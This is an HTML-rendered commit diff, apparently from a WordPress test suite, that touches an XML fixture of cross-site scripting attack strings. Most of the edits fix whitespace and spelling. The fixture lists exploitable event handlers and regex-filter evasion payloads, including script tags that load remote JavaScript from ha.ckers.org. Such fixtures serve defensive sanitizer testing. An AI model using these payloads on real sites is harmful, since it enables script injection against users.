</ins><span class="cx" style="display: block; padding: 0 10px"> -onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
--onDataAvailible() (user would need to change data in an element, or attacker could perform the same function)
-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
+-onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDataSetChanged() (fires when the data set exposed by a data source object changes)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDataSetComplete() (fires to indicate that all data is available from the data source object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDblClick() (fires when user double-clicks a form element or a link)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDrag() (requires that the user drags an object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDragEnd() (requires that the user drags an object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDragLeave() (requires that the user drags an object off a valid location)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDragEnter() (requires that the user drags an object into a valid location)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDragOver() (requires that the user drags an object into a valid location)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDragDrop() (user drops an object (e.g. file) onto the browser window)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onDrop() (fires when user drops an object (e.g. file) onto the browser window)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-</desc>
- <label>Event Handlers</label>
- <browser>Browser support:</browser>
- </attack>
- <attack>
- <name>Event Handlers List 2</name>
- <code>See Below</code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+</desc>
+ <label>Event Handlers</label>
+ <browser>Browser support:</browser>
+ </attack>
+ <attack>
+ <name>Event Handlers List 2</name>
+ <code>See Below</code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>-onEnd() (fires when the timeline ends. This can be exploited, like most of the HTML+TIME event handlers by doing something like <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onError() (loading of a document or image causes an error)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onFilterChange() (fires when a visual filter completes state change)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onFinish() (attacker could create the exploit when marquee is finished looping)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onFocus() (attacker executes the attack string when the window gets focus)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onFocusIn() (attacker executes the attack string when window gets focus)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onFocusOut() (attacker executes the attack string when window loses focus)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onKeyDown() (fires when user depresses a key)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onKeyPress() (fires when user presses or holds down a key)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onKeyUp() (fires when user releases a key)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onLayoutComplete() (user would have to print or print preview)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onLoad() (attacker executes the attack string after the window loads)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onLoseCapture() (can be exploited by the releaseCapture() method)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMediaComplete() (when a streaming media file is used, this event could fire before the file starts playing)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseDown() (the attacker would need to get the user to click on an image)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseEnter() (fires when cursor moves over an object or area)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseMove() (the attacker would need to get the user to mouse over an image or table)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseOver() (fires when cursor moves over an object or area)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseUp() (the attacker would need to get the user to click on an image)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMove() (user or attacker would move the page)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMoveEnd() (user or attacker would move the page)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onMoveStart() (user or attacker would move the page)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onPaste() (user would need to paste or attacker could use the execCommand("Paste") function)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onPause() (fires on every element that is active when the timeline pauses, including the body element)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onProgress() (attacker would use this as a flash movie was loading)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onPropertyChange() (user or attacker would need to change an element property)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onReadyStateChange() (user or attacker would need to change an element property)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-</desc>
- <label>Event Handlers</label>
- <browser>Browser support:</browser>
- </attack>
- <attack>
- <name>Event Handlers List 3</name>
- <code>See Below</code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+</desc>
+ <label>Event Handlers</label>
+ <browser>Browser support:</browser>
+ </attack>
+ <attack>
+ <name>Event Handlers List 3</name>
+ <code>See Below</code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>-onRepeat() (fires once for each repetition of the timeline, excluding the first full cycle)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onReset() (fires when user or attacker resets a form)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onResume() (fires on every element that becomes active when the timeline resumes, including the body element)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onRowEnter() (user or attacker would need to change a row in a data source)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onRowExit() (user or attacker would need to change a row in a data source)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onRowsDelete() (user or attacker would need to delete a row in a data source)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onRowsInserted() (user or attacker would need to insert a row in a data source)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onSeek() (fires when the timeline is set to play in any direction other than forward)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onStart() (fires at the beginning of each marquee loop)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onStop() (user would need to press the stop button or leave the webpage)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onSubmit() (requires attacker or user submits a form)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onTimeError() (fires when user or attacker sets a time property, such as "dur", to an invalid value)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onTrackChange() (fires when user or attacker changes track in a playList)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onUnload() (fires when the user clicks any link or presses the back button or attacker forces a click)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onURLFlip() (fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -seekSegmentTime() (locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-</desc>
- <label>Event Handlers</label>
- <browser>Browser support:</browser>
- </attack>
- <attack>
- <name>Evade Regex Filter 1</name>
- <code><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+</desc>
+ <label>Event Handlers</label>
+ <browser>Browser support:</browser>
+ </attack>
+ <attack>
+ <name>Evade Regex Filter 1</name>
+ <code><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of the following regex filter:
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- /<script[^>]+src/i</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Evade Regex Filter 2</name>
- <code><SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ /<script[^>]+src/i</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Evade Regex Filter 2</name>
+ <code><SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter:
</span><span class="cx" style="display: block; padding: 0 10px"> /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
-(this is an important one, because I've seen this regex in the wild)</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Evade Regex Filter 3</name>
- <code><SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
+(this is an important one, because I've seen this regex in the wild)</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Evade Regex Filter 3</name>
+ <code><SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>Another XSS to evade this regex filter:
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Evade Regex Filter 4</name>
- <code><SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Evade Regex Filter 4</name>
+ <code><SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>Yet another XSS to evade the same filter:
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i
-The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags)</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Evade Regex Filter 5</name>
- <code><SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i
+The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags)</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Evade Regex Filter 5</name>
+ <code><SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>And one last XSS attack (using grave accents) to evade this regex:
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Filter Evasion 1</name>
- <code><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
- <desc>This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content.</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Filter Evasion 2</name>
- <code><SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
- <desc>Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly.</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
</ins><span class="cx" style="display: block; padding: 0 10px"> </attack>
</span><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ <attack>
+ <name>Filter Evasion 1</name>
+ <code><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
+ <desc>This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content.</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Filter Evasion 2</name>
+ <code><SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
+ <desc>Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly.</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
</ins><span class="cx" style="display: block; padding: 0 10px"> </xss>
</span></span></pre></div>
<a id="trunktestsphpunitincludesabstracttestcasephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/includes/abstract-testcase.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/includes/abstract-testcase.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/includes/abstract-testcase.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1642,7 +1642,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Touches the given file and its directory if it doesn't already exist.
</span><span class="cx" style="display: block; padding: 0 10px"> *
